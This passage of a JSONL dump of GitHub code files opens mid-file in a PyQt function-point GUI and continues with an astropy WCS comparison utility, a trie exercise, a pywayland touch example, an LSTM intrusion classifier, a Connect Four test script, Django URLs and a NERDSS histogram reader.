int(self.fp)))\n self.Language_Label_2.setText(self.lang)\n\n def save(self):\n # self.new_dict[]\n # print(\"FP new dict contains {}\".format(self.new_dict))\n self.new_dict = {}\n self.new_dict[\"EI_lineedit\"] = self.EI_lineedit_2.text()\n self.new_dict[\"EO_lineedit\"] = self.EO_lineedit_2.text()\n self.new_dict[\"EInq_lineedit\"] = self.EInq_lineedit_2.text()\n self.new_dict[\"ILF_lineedit\"] = self.ILF_lineedit_2.text()\n self.new_dict[\"EIF_lineedit\"] = self.EIF_lineedit_2.text()\n ##\n self.new_dict[\"EI_Label\"] = self.EI_Label_2.text()\n self.new_dict[\"EO_Label\"] = self.EO_Label_2.text()\n self.new_dict[\"EInq_Label\"] = self.EInq_Label_2.text()\n self.new_dict[\"ILF_Label\"] = self.ILF_Label_2.text()\n self.new_dict[\"EIF_Label\"] = self.EIF_Label_2.text()\n self.new_dict[\"TC_Label\"] = self.TC_Label_2.text()\n self.new_dict[\"FP_Label\"] = self.FP_Label_2.text()\n self.new_dict[\"VAF_Label\"] = self.VAF_Label_2.text()\n self.new_dict[\"CodeSize_Label\"] = self.CodeSize_Label_2.text()\n ##\n if self.radioButton_28.isChecked():\n self.new_dict[\"radioButton_28\"] = True\n if self.radioButton_29.isChecked():\n self.new_dict[\"radioButton_29\"] = True\n if self.radioButton_30.isChecked():\n self.new_dict[\"radioButton_30\"] = True\n if self.radioButton_16.isChecked():\n self.new_dict[\"radioButton_16\"] = True\n if self.radioButton_17.isChecked():\n self.new_dict[\"radioButton_17\"] = True\n if self.radioButton_18.isChecked():\n self.new_dict[\"radioButton_18\"] = True\n if self.radioButton_22.isChecked():\n self.new_dict[\"radioButton_22\"] = True\n if self.radioButton_23.isChecked():\n self.new_dict[\"radioButton_23\"] = True\n if self.radioButton_24.isChecked():\n self.new_dict[\"radioButton_24\"] = True\n if self.radioButton_19.isChecked():\n self.new_dict[\"radioButton_19\"] = True\n if self.radioButton_20.isChecked():\n self.new_dict[\"radioButton_20\"] = True\n if self.radioButton_21.isChecked():\n self.new_dict[\"radioButton_21\"] = True\n if self.radioButton_25.isChecked():\n self.new_dict[\"radioButton_25\"] = True\n if self.radioButton_26.isChecked():\n self.new_dict[\"radioButton_26\"] = True\n if self.radioButton_27.isChecked():\n self.new_dict[\"radioButton_27\"] = True\n ##\n self.new_dict[\"language\"] = self.Language_Label_2.text()\n ##\n # print(\"FP is returning: {}\".format(self.new_dict))\n return self.new_dict\n\n def restore_data(self):\n self.EI_lineedit_2.setText(self.new_dict[\"EI_lineedit\"])\n self.EO_lineedit_2.setText(self.new_dict[\"EO_lineedit\"])\n self.EInq_lineedit_2.setText(self.new_dict[\"EInq_lineedit\"])\n self.ILF_lineedit_2.setText(self.new_dict[\"ILF_lineedit\"])\n self.EIF_lineedit_2.setText(self.new_dict[\"EIF_lineedit\"])\n self.EI_Label_2.setText(str(self.new_dict[\"EI_Label\"]))\n self.EO_Label_2.setText(self.new_dict[\"EO_Label\"])\n self.EInq_Label_2.setText(self.new_dict[\"EInq_Label\"])\n self.ILF_Label_2.setText(self.new_dict[\"ILF_Label\"])\n self.EIF_Label_2.setText(self.new_dict[\"EIF_Label\"])\n self.TC_Label_2.setText(self.new_dict[\"TC_Label\"])\n self.FP_Label_2.setText(self.new_dict[\"FP_Label\"])\n self.VAF_Label_2.setText(self.new_dict[\"VAF_Label\"])\n self.CodeSize_Label_2.setText(self.new_dict[\"CodeSize_Label\"])\n ##\n if \"radioButton_28\" in self.new_dict:\n self.radioButton_28.setChecked(True)\n if \"radioButton_29\" in self.new_dict:\n self.radioButton_29.setChecked(True)\n if \"radioButton_30\" in self.new_dict:\n self.radioButton_30.setChecked(True)\n if \"radioButton_16\" in self.new_dict:\n self.radioButton_16.setChecked(True)\n if \"radioButton_17\" in self.new_dict:\n self.radioButton_17.setChecked(True)\n if \"radioButton_18\" in self.new_dict:\n self.radioButton_18.setChecked(True)\n if \"radioButton_22\" in self.new_dict:\n self.radioButton_22.setChecked(True)\n if \"radioButton_23\" in self.new_dict:\n self.radioButton_23.setChecked(True)\n if \"radioButton_24\" in self.new_dict:\n self.radioButton_24.setChecked(True)\n if \"radioButton_19\" in self.new_dict:\n self.radioButton_19.setChecked(True)\n if \"radioButton_20\" in self.new_dict:\n self.radioButton_20.setChecked(True)\n if \"radioButton_21\" in self.new_dict:\n self.radioButton_21.setChecked(True)\n if \"radioButton_25\" in self.new_dict:\n self.radioButton_25.setChecked(True)\n if \"radioButton_26\" in self.new_dict:\n self.radioButton_26.setChecked(True)\n if \"radioButton_27\" in self.new_dict:\n self.radioButton_27.setChecked(True)\n #\n if self.new_dict[\"language\"] == \"Assembler\":\n self.displaylang_result, self.lang = (337, \"Assembler\")\n self.Language_Label_2.setText(\"Assembler\")\n elif self.new_dict[\"language\"] == \"ADA\":\n self.displaylang_result, self.lang = (154, \"ADA\")\n self.Language_Label_2.setText(\"ADA\")\n elif self.new_dict[\"language\"] == \"C\":\n self.displaylang_result, self.lang = (148,\"C\")\n self.Language_Label_2.setText(\"C\")\n elif self.new_dict[\"language\"] == \"C++\":\n self.displaylang_result, self.lang = (59, \"C++\")\n self.Language_Label_2.setText(\"C++\")\n elif self.new_dict[\"language\"] == \"C#\":\n self.displaylang_result, self.lang = (58, \"C#\")\n self.Language_Label_2.setText(\"C#\")\n elif self.new_dict[\"language\"] == \"COBOL\":\n self.displaylang_result, self.lang = (80, \"COBOL\")\n self.Language_Label_2.setText(\"COBOL\")\n if self.new_dict[\"language\"] == \"FORTRAN\":\n self.displaylang_result, self.lang = (90, \"FORTRAN\")\n self.Language_Label_2.setText(\"FORTRAN\")\n elif self.new_dict[\"language\"] == \"HTML\":\n self.displaylang_result, self.lang = (43, \"HTML\")\n self.Language_Label_2.setText(\"HTML\")\n elif self.new_dict[\"language\"] == \"Java\":\n self.displaylang_result, self.lang = (55, \"Java\")\n self.Language_Label_2.setText(\"Java\")\n elif self.new_dict[\"language\"] == \"JavaScript\":\n self.displaylang_result, self.lang = (54, \"JavaScript\")\n self.Language_Label_2.setText(\"JavaScript\")\n elif self.new_dict[\"language\"] == \"VB Script\":\n self.displaylang_result, self.lang = (38, \"VB Script\")\n self.Language_Label_2.setText(\"VB Script\")\n elif self.new_dict[\"language\"] == \"Visual Basic\":\n self.displaylang_result, self.lang = (50, \"Visual Basic\")\n self.Language_Label_2.setText(\"Visual Basic\")\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\n self.label_12.setText(_translate(\"Form\", \"Complex\"))\n self.ILF_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_13.setText(_translate(\"Form\", \"Average\"))\n self.label_14.setText(_translate(\"Form\", \"External Outputs\"))\n self.radioButton_16.setText(_translate(\"Form\", \"4\"))\n self.radioButton_17.setText(_translate(\"Form\", \"5\"))\n self.radioButton_18.setText(_translate(\"Form\", \"7\"))\n self.FP_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_15.setText(_translate(\"Form\", \"Weighting Factors\"))\n self.EO_Label_2.setText(_translate(\"Form\", \"0\"))\n self.EI_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_16.setText(_translate(\"Form\", \"Internal Logic Files\"))\n self.radioButton_19.setText(_translate(\"Form\", \"7\"))\n self.radioButton_20.setText(_translate(\"Form\", \"10\"))\n self.radioButton_21.setText(_translate(\"Form\", \"15\"))\n self.TC_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_17.setText(_translate(\"Form\", \"External Inquiries\"))\n self.radioButton_22.setText(_translate(\"Form\", \"3\"))\n self.radioButton_23.setText(_translate(\"Form\", \"4\"))\n self.radioButton_24.setText(_translate(\"Form\", \"6\"))\n self.Language_Label_2.setText(_translate(\"Form\", \"None\"))\n self.label_18.setText(_translate(\"Form\", \"Ext Interface Files\"))\n self.radioButton_25.setText(_translate(\"Form\", \"5\"))\n self.radioButton_26.setText(_translate(\"Form\", \"7\"))\n self.radioButton_27.setText(_translate(\"Form\", \"10\"))\n self.computefp_btn_2.setText(_translate(\"Form\", \"Compute FP\"))\n self.vaf_btn_2.setText(_translate(\"Form\", \"Value Adjustments\"))\n self.codesize_btn_2.setText(_translate(\"Form\", \"Compute Code Size\"))\n self.chooselang_btn_2.setText(_translate(\"Form\", \"Change Language\"))\n self.CodeSize_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_19.setText(_translate(\"Form\", \"Current Language\"))\n self.label_20.setText(_translate(\"Form\", \"Total Count\"))\n self.VAF_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_21.setText(_translate(\"Form\", \"External Inputs\"))\n self.radioButton_28.setText(_translate(\"Form\", \"3\"))\n self.radioButton_29.setText(_translate(\"Form\", \"4\"))\n self.radioButton_30.setText(_translate(\"Form\", \"6\"))\n self.EInq_Label_2.setText(_translate(\"Form\", \"0\"))\n self.label_22.setText(_translate(\"Form\", \"Simple\"))\n self.EIF_Label_2.setText(_translate(\"Form\", \"0\"))\n self.radioButton_29.setChecked(True)\n self.radioButton_17.setChecked(True)\n self.radioButton_23.setChecked(True)\n self.radioButton_20.setChecked(True)\n self.radioButton_26.setChecked(True)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n Form = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form, \"First\")\n Form.show()\n sys.exit(app.exec_())\n","repo_name":"roshangardi/FunctionPointGUI","sub_path":"SE_application/SE_functionPoint.py","file_name":"SE_functionPoint.py","file_ext":"py","file_size_in_byte":29025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18120024161","text":"from astropy import wcs as pywcs\nfrom collections import OrderedDict\nfrom astropy.io import fits\nfrom .headerlet import parse_filename\nimport numpy as np\n\n\ndef is_wcs_identical(scifile, file2, sciextlist, fextlist, scikey=\" \",\n file2key=\" \", verbose=False):\n \"\"\"\n Compares the WCS solution of 2 files.\n\n Parameters\n ----------\n scifile: string\n name of file1 (usually science file)\n IRAF style extension syntax is accepted as well\n for example scifile[1] or scifile[sci,1]\n file2: string\n name of second file (for example headerlet)\n sciextlist - list\n a list of int or tuple ('SCI', 1), extensions in the first file\n fextlist - list\n a list of int or tuple ('SIPWCS', 1), extensions in the second file\n scikey: string\n alternate WCS key in scifile\n file2key: string\n alternate WCS key in file2\n verbose: bool\n True: print to stdout\n\n Notes\n -----\n These can be 2 science observations or 2 headerlets\n or a science observation and a headerlet. The two files\n have the same WCS solution if the following are the same:\n\n - rootname/destim\n - primary WCS\n - SIP coefficients\n - NPOL distortion\n - D2IM correction\n\n \"\"\"\n result = True\n diff = OrderedDict()\n fobj, fname, close_file = parse_filename(file2)\n sciobj, sciname, close_scifile = parse_filename(scifile)\n diff['file_names'] = [scifile, file2]\n if get_rootname(scifile) != get_rootname(file2):\n # logger.info('Rootnames do not match.')\n diff['rootname'] = (\"%s: %s\", \"%s: %s\") % (sciname, get_rootname(scifile), file2,\n get_rootname(file2))\n result = False\n for i, j in zip(sciextlist, fextlist):\n w1 = pywcs.WCS(sciobj[i].header, sciobj, key=scikey)\n w2 = pywcs.WCS(fobj[j].header, fobj, key=file2key)\n diff['extension'] = [get_extname_extnum(sciobj[i]), get_extname_extnum(fobj[j])]\n if not np.allclose(w1.wcs.crval, w2.wcs.crval, rtol=10**(-7)):\n # logger.info('CRVALs do not match')\n diff['CRVAL'] = w1.wcs.crval, w2.wcs.crval\n result = False\n if not np.allclose(w1.wcs.crpix, w2.wcs.crpix, rtol=10**(-7)):\n # logger.info('CRPIX do not match')\n diff['CRPIX'] = w1.wcs.crpix, w2.wcs.crpix\n result = False\n if not np.allclose(w1.wcs.cd, w2.wcs.cd, rtol=10**(-7)):\n # logger.info('CDs do not match')\n diff['CD'] = w1.wcs.cd, w2.wcs.cd\n result = False\n if not (np.array(w1.wcs.ctype) == np.array(w2.wcs.ctype)).all():\n # logger.info('CTYPEs do not match')\n diff['CTYPE'] = w1.wcs.ctype, w2.wcs.ctype\n result = False\n if w1.sip or w2.sip:\n if (w2.sip and not w1.sip) or (w1.sip and not w2.sip):\n diff['sip'] = 'one sip extension is missing'\n result = False\n if not np.allclose(w1.sip.a, w2.sip.a, rtol=10**(-7)):\n diff['SIP_A'] = 'SIP_A differ'\n result = False\n if not np.allclose(w1.sip.b, w2.sip.b, rtol=10**(-7)):\n # logger.info('SIP coefficients do not match')\n diff['SIP_B'] = (w1.sip.b, w2.sip.b)\n result = False\n if w1.cpdis1 or w2.cpdis1:\n if w1.cpdis1 and not w2.cpdis1 or w2.cpdis1 and not w1.cpdis1:\n diff['CPDIS1'] = \"CPDIS1 missing\"\n result = False\n if w1.cpdis2 and not w2.cpdis2 or w2.cpdis2 and not w1.cpdis2:\n diff['CPDIS2'] = \"CPDIS2 missing\"\n result = False\n if not np.allclose(w1.cpdis1.data, w2.cpdis1.data, rtol=10**(-7)):\n # logger.info('NPOL distortions do not match')\n diff['CPDIS1_data'] = (w1.cpdis1.data, w2.cpdis1.data)\n result = False\n if not np.allclose(w1.cpdis2.data, w2.cpdis2.data, rtol=10**(-7)):\n # logger.info('NPOL distortions do not match')\n diff['CPDIS2_data'] = (w1.cpdis2.data, w2.cpdis2.data)\n result = False\n if w1.det2im1 or w2.det2im1:\n if w1.det2im1 and not w2.det2im1 or \\\n w2.det2im1 and not w1.det2im1:\n diff['DET2IM'] = \"Det2im1 missing\"\n result = False\n if not np.allclose(w1.det2im1.data, w2.det2im1.data, rtol=10**(-7)):\n # logger.info('Det2Im corrections do not match')\n diff['D2IM1_data'] = (w1.det2im1.data, w2.det2im1.data)\n result = False\n if w1.det2im2 or w2.det2im2:\n if w1.det2im2 and not w2.det2im2 or \\\n w2.det2im2 and not w1.det2im2:\n diff['DET2IM2'] = \"Det2im2 missing\"\n result = False\n if not np.allclose(w1.det2im2.data, w2.det2im2.data, rtol=10**(-7)):\n # logger.info('Det2Im corrections do not match')\n diff['D2IM2_data'] = (w1.det2im2.data, w2.det2im2.data)\n result = False\n if not result and verbose:\n for key in diff:\n print(key, \":\\t\", diff[key][0], \"\\t\", diff[key][1])\n if close_file:\n fobj.close()\n if close_scifile:\n sciobj.close()\n return result, diff\n\n\ndef get_rootname(fname):\n \"\"\"\n Returns the value of ROOTNAME or DESTIM\n \"\"\"\n\n hdr = fits.getheader(fname)\n try:\n rootname = hdr['ROOTNAME']\n except KeyError:\n try:\n rootname = hdr['DESTIM']\n except KeyError:\n rootname = fname\n return rootname\n\n\ndef get_extname_extnum(ext):\n \"\"\"\n Return (EXTNAME, EXTNUM) of a FITS extension\n \"\"\"\n extname = \"\"\n extnum = 1\n extname = ext.header.get('EXTNAME', extname)\n extnum = ext.header.get('EXTVER', extnum)\n return (extname, extnum)\n","repo_name":"spacetelescope/stwcs","sub_path":"stwcs/wcsutil/wcsdiff.py","file_name":"wcsdiff.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1387417014","text":"from collections import defaultdict\nimport sys\ninput = sys.stdin.readline\n\n\nclass TrieNode:\n def __init__(self, key, data=None):\n self.children = defaultdict(str)\n self.key = key\n self.data = data\n\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode(None)\n\n def insert(self, string):\n curr_node = self.root\n\n for char in string:\n if char not in curr_node.children:\n curr_node.children[char] = TrieNode(char)\n curr_node = curr_node.children[char]\n curr_node.data = string\n\n def search(self, string):\n curr_node = self.root\n\n for char in string:\n if char in curr_node.children:\n curr_node = curr_node.children[char]\n else:\n return False\n if curr_node.data:\n return True\n return False\n\n\nn, m = map(int, input().split())\ntrie = Trie()\ncnt = 0\nfor i in range(n + m):\n string = input().strip()\n if i < n:\n trie.insert(string)\n else:\n if trie.search(string):\n cnt += 1\nprint(cnt)\n\n","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/14425/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35516961485","text":"import mmap\nimport os\nimport sys\nimport tempfile\n\nthis_file = os.path.abspath(__file__)\nthis_dir = os.path.split(this_file)[0]\nroot_dir = os.path.split(this_dir)[0]\npywayland_dir = os.path.join(root_dir, \"pywayland\")\nif os.path.exists(pywayland_dir):\n sys.path.append(root_dir)\n\nfrom pywayland.client import Display # noqa: E402\nfrom pywayland.protocol.wayland import ( # noqa: E402\n WlCompositor,\n WlSeat,\n WlShell,\n WlShm,\n)\n\n\ndef create_shm_buffer(touch, width, height):\n stride = width * 4\n size = stride * height\n\n with tempfile.TemporaryFile() as f:\n f.write(b\"\\x64\" * size)\n f.flush()\n\n fd = f.fileno()\n touch[\"data\"] = mmap.mmap(\n fd, size, mmap.MAP_SHARED, mmap.PROT_READ | mmap.PROT_WRITE\n )\n pool = touch[\"shm\"].create_pool(fd, size)\n touch[\"buffer\"] = pool.create_buffer(\n 0, width, height, stride, WlShm.format.argb8888.value\n )\n pool.destroy()\n\n\ndef handle_touch_down(wl_touch, serial, time, surface, id, x, y):\n # touch = wl_touch.user_data\n # touch_paint(touch, x, y, id)\n return 0\n\n\ndef handle_touch_motion(wl_touch, time, id, x, y):\n # touch = wl_touch.user_data\n # touch_paint(touch, x, y, id)\n return 0\n\n\ndef handle_seat_capabilities(wl_seat, capabilities):\n print(\"capabilities\")\n seat = wl_seat.user_data\n touch = seat[\"touch\"]\n\n if (capabilities & WlSeat.capability.touch.value) and seat[\"wl_touch\"] is None:\n seat[\"wl_touch\"] = wl_seat.get_touch()\n seat[\"wl_touch\"].user_data = touch\n seat[\"wl_touch\"].dispatcher[\"down\"] = handle_touch_down\n # seat['wl_touch'].dispatcher['up'] = handle_touch_up\n seat[\"wl_touch\"].dispatcher[\"motion\"] = handle_touch_motion\n elif not (capabilities & WlSeat.capability.touch.value) and seat[\"wl_touch\"]:\n seat[\"wl_touch\"].destroy()\n seat[\"wl_touch\"] = None\n return 1\n\n\ndef handle_shm_format(wl_shm, fmt):\n print(\"format\")\n touch = wl_shm.user_data\n\n if fmt == WlShm.format.argb8888.value:\n touch[\"has_argb\"] = True\n return 1\n\n\ndef handle_shell_surface_ping(wl_shell_surface, serial):\n print(\"ping\")\n wl_shell_surface.pong(serial)\n return 1\n\n\ndef handle_registry_global(wl_registry, id_num, iface_name, version):\n print(\"global\", id_num, iface_name)\n\n touch = wl_registry.user_data\n if iface_name == \"wl_compositor\":\n touch[\"compositor\"] = wl_registry.bind(id_num, WlCompositor, version)\n elif iface_name == \"wl_seat\":\n seat = {}\n seat[\"touch\"] = touch\n seat[\"wl_touch\"] = None\n\n wl_seat = wl_registry.bind(id_num, WlSeat, version)\n wl_seat.dispatcher[\"capabilities\"] = handle_seat_capabilities\n wl_seat.user_data = seat\n seat[\"seat\"] = wl_seat\n elif iface_name == \"wl_shell\":\n touch[\"shell\"] = wl_registry.bind(id_num, WlShell, version)\n elif iface_name == \"wl_shm\":\n touch[\"has_argb\"] = False\n\n shm = wl_registry.bind(id_num, WlShm, version)\n shm.user_data = touch\n shm.dispatcher[\"format\"] = handle_shm_format\n touch[\"shm\"] = shm\n return 1\n\n\ndef touch_create(width, height):\n touch = {}\n\n # Make the display and get the registry\n touch[\"display\"] = Display()\n touch[\"display\"].connect()\n\n touch[\"registry\"] = touch[\"display\"].get_registry()\n touch[\"registry\"].user_data = touch\n touch[\"registry\"].dispatcher[\"global\"] = handle_registry_global\n\n touch[\"display\"].dispatch()\n touch[\"display\"].roundtrip()\n touch[\"display\"].roundtrip()\n\n if not touch[\"has_argb\"]:\n print(\"WL_SHM_FORMAT_ARGB32 not available\", file=sys.stderr)\n touch[\"display\"].disconnect()\n return\n\n touch[\"width\"] = width\n touch[\"height\"] = height\n touch[\"surface\"] = touch[\"compositor\"].create_surface()\n touch[\"shell_surface\"] = touch[\"shell\"].get_shell_surface(touch[\"surface\"])\n create_shm_buffer(touch, width, height)\n\n if touch[\"shell_surface\"]:\n print(\"shell\")\n touch[\"shell_surface\"].dispatcher[\"ping\"] = handle_shell_surface_ping\n touch[\"shell_surface\"].set_toplevel()\n\n touch[\"surface\"].user_data = touch\n touch[\"shell_surface\"].set_title(\"simple-touch\")\n\n touch[\"surface\"].attach(touch[\"buffer\"], 0, 0)\n touch[\"surface\"].damage(0, 0, width, height)\n touch[\"surface\"].commit()\n\n return touch\n\n\ndef main():\n touch = touch_create(600, 500)\n\n while touch[\"display\"].dispatch() != -1:\n pass\n\n touch[\"display\"].disconnect()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"flacjacket/pywayland","sub_path":"example/simple-touch.py","file_name":"simple-touch.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"48"} +{"seq_id":"29672134935","text":"# lstm model\nimport numpy as np\nimport time\nimport keras_metrics as km\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Flatten\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\n\nimport tensorflow as tf\nsess = tf.Session(config=tf.ConfigProto(log_device_placement=True))\n\ntrainX = np.loadtxt('X_train.txt', delimiter=\" \")\ntrainy = np.loadtxt('y_train.txt')\ntestX = np.loadtxt('Xs_test.txt', delimiter=\" \")\ntesty = np.loadtxt('ys_test.txt')\n\nxmin = np.array([0,0,0,0,0,0,0,-48,0,-15.0234742,0,0,0,0,0,0,-3276.8,0,0,0])\nxmax = np.array([3,99.6094,16383.75,99.6094,99.6094,254,3,143.25,3,104.6948357,99.603,25.8984375,99.609375,99.609375,99.609375,99.609375,3276.8,1016,15,15])\nxptp = xmax - xmin\ntrainX = (trainX - xmin) / xptp\ntestX = (testX - xmin) / xptp\n\nshape = np.shape(trainX)\ntrainX = trainX.reshape(shape[0],1,shape[1])\nshape = np.shape(trainy)\ntrainy = trainy.reshape(shape[0],1)\nshape = np.shape(testX)\ntestX = testX.reshape(1,1,shape[0])\nshape = np.shape(testy)\nprint(shape)\ntesty = testy.reshape(1,1)\n\n# fit and evaluate a model\n\nepochs, batch_size, n_neurons, dropout = 50, 128, 50, 0.5\nn_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\nmodel = Sequential()\nmodel.add(LSTM(n_neurons, input_shape=(n_timesteps,n_features)))\nmodel.add(Dropout(dropout))\nmodel.add(Dense(n_neurons, activation='relu'))\nmodel.add(Dense(n_outputs, activation='sigmoid'))\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['binary_accuracy', km.binary_precision(), km.binary_recall(), km.binary_true_positive(), km.binary_false_positive(), km.binary_true_negative(), km.binary_false_negative()])\n# fit network\nmodel.fit(trainX, trainy, epochs=epochs, batch_size=batch_size, verbose=1)\n# evaluate model\n_, ba, pr, rec, tp, fp, tn, fn = model.evaluate(testX, testy, batch_size=batch_size, verbose=0)\nstart_eval = time.time()\nout = model.predict_classes(testX)\nend_eval = time.time() - start_eval\nprint(end_eval)\n#print(ba, pr, rec, end_eval)\n#print(hist.history)\n","repo_name":"zadid56/in-vehicle-security","sub_path":"scripts/lstm_class_test.py","file_name":"lstm_class_test.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33522920976","text":"from LL.LL_SetPilot import SetPilot\n\nimport csv\n\nclass SetPilot_file:\n\n def set_Pilot_file(self, other):\n with open('Crew.csv', 'a', newline='') as destination_file:\n wr = csv.writer(destination_file, dialect='excel')\n wr.writerow(other)\n\nif __name__ == \"__main__\":\n SetPilot_file().set_Pilot_file(SetPilot().setpilot())","repo_name":"gunnsa/Nan_Air_hopur20","sub_path":"Glósur/IO_SetPilot.py","file_name":"IO_SetPilot.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20073297644","text":"# AI for Games - Beat the Snake game\r\n# Testing the AI\r\n\r\n# Importing the libraries\r\nimport enviroment as env\r\nfrom brain import Brain\r\nimport pygame as pg\r\nimport numpy as np\r\nimport random\r\nimport math\r\n\r\n# Defining the parameters\r\nnLastStates = 4\r\nfilepathToOpen = 'model_data/test1.h5'\r\nslowdown = 75\r\n\r\n# Creating the Environment and the Brain\r\nenv = env.Enviroment(\"test\")\r\nbrain = Brain((6, 7, nLastStates))\r\nmodel = brain.loadModel(filepathToOpen)\r\n\r\n\r\n# Initializing the pygame window\r\nenv.drawScreen()\r\n\r\n# Making a function that will reset game states\r\ndef resetStates():\r\n currentState = np.zeros((1, 6, 7, nLastStates))\r\n \r\n for i in range(nLastStates):\r\n currentState[:,:,:,i] = env.getBoard()\r\n \r\n return currentState, currentState\r\n\r\n# Starting the main loop\r\nwhile True:\r\n # Resetting the game and the game states\r\n env.reset()\r\n currentState, nextState = resetStates()\r\n gameOver = False\r\n \r\n # Playing the game\r\n while not gameOver: \r\n\r\n # Choosing an action to play\r\n valid_moves = env.getValidMoves()\r\n\r\n # else, choose the action with the highest q-value, but only from the valid moves\r\n\r\n qvalues = model.predict(currentState)\r\n print(\"valid moves: \", valid_moves)\r\n print(\"qvalues: \", qvalues)\r\n \r\n # remove the q-values for invalid moves by setting invalid moves to negative infinity\r\n for i in range(7):\r\n if i not in valid_moves:\r\n qvalues[0][i] = -math.inf\r\n\r\n print(\"new qvalues: \", qvalues)\r\n action = np.argmax(qvalues[0])\r\n print(\"action: \", action)\r\n \r\n # Updating the environment\r\n\r\n # make the ai move\r\n state, reward_1, gameOver = env.tryMove(action, 1)\r\n \r\n # Adding new game frame to next state and deleting the oldest one from next state\r\n state = np.reshape(state, (1, env.nRows, env.nColumns, 1))\r\n nextState = np.append(nextState, state, axis = 3)\r\n nextState = np.delete(nextState, 0, axis = 3)\r\n \r\n # Updating current state\r\n currentState = nextState\r\n\r\n # Displaying the game\r\n env.drawScreen()\r\n env.display()\r\n\r\n # get the player's move, filtering for valid moves\r\n valid_moves = env.getValidMoves()\r\n action = None\r\n while action not in valid_moves:\r\n for event in pg.event.get():\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n exit()\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_1:\r\n action = 0\r\n if event.key == pg.K_2:\r\n action = 1\r\n if event.key == pg.K_3:\r\n action = 2\r\n if event.key == pg.K_4:\r\n action = 3\r\n if event.key == pg.K_5:\r\n action = 4\r\n if event.key == pg.K_6:\r\n action = 5\r\n if event.key == pg.K_7:\r\n action = 6\r\n\r\n\r\n # make the player's move\r\n state, reward_2, gameOver = env.tryMove(action, 2)\r\n \r\n \r\n env.drawScreen()\r\n env.display()\r\n\r\n # Slow down the game\r\n pg.time.wait(slowdown)\r\n","repo_name":"JonathanBergen/sattler-coursework","sub_path":"light-blue-connect4/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8342126876","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('user/', include('authentication.urls')),\n path('our-team/', include('our_team.urls')),\n path('review/', include('client_review.urls')),\n path('contact/', include('contact_us.urls')),\n path('slider/', include('homepage_slider.urls')),\n path('promotion/', include('promotion.urls')),\n path('service/', include('service.urls')),\n path('project/', include('catkin_project.urls'))\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"sharif181/catkin","sub_path":"catkin/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43492351566","text":"def read_file(FileName: str, SpeciesName: str):\n \"\"\"Will take in a histogram.dat (single-species) and turn it into a list of lists\n\n Args:\n FileName (str): Path to the histogram.dat file\n SpeciesName (str): The name of the specific species you want to examine. Should be in the .dat file.\n\n Returns:\n list of lists: Has many lists, where each sub-list is a new time stamp that includes time at list[i][0]. You can find list \n of number of each complex type in list[i][1]. List of the number of species count in complex in list[i][2].\n \"\"\"\n \n #general vars \n hist = [] # main list that holds each timestamp\n hist_temp = [] # holds all info in 1 timestamp.\n hist_conv = [] # number of species in this complex type at 1 timestamp\n hist_count = [] # num of this complex type at 1 timestamp\n \n #eads through the file\n with open(FileName, 'r') as file:\n for line in file.readlines():\n \n #determining what the line holds\n if line[0:4] == 'Time':\n \n #if this is NOT the first run, add the temp lists to the main list\n if hist_count != [] and hist_conv != []:\n hist_temp.append(hist_count)\n hist_temp.append(hist_conv)\n hist.append(hist_temp)\n \n #reset the temp lists\n hist_count = []\n hist_conv = []\n hist_temp = []\n\n #set time to start of new temp list\n hist_temp.append(float(line.strip('Time (s): ')))\n \n #if the line holds species information\n else:\n\n #split the line and determine if it has the right species name\n string = '\t' + str(SpeciesName) + ': '\n line = line.strip('. \\n').split(string)\n if len(line) != 2:\n raise Exception('invalid species name')\n \n #adds values to the sub - temp list\n else:\n hist_count.append(int(line[0]))\n hist_conv.append(int(line[1]))\n \n #if it is the last run, add it in (needs to be here b/c temps are added at start of new time, not end of previous time)\n hist_temp.append(hist_count)\n hist_temp.append(hist_conv)\n hist.append(hist_temp)\n \n return hist\n\n\n","repo_name":"mjohn218/io_nerdss","sub_path":"ioNERDSSPyPi/ioNERDSS/functions/histograms/single_species/read_file.py","file_name":"read_file.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 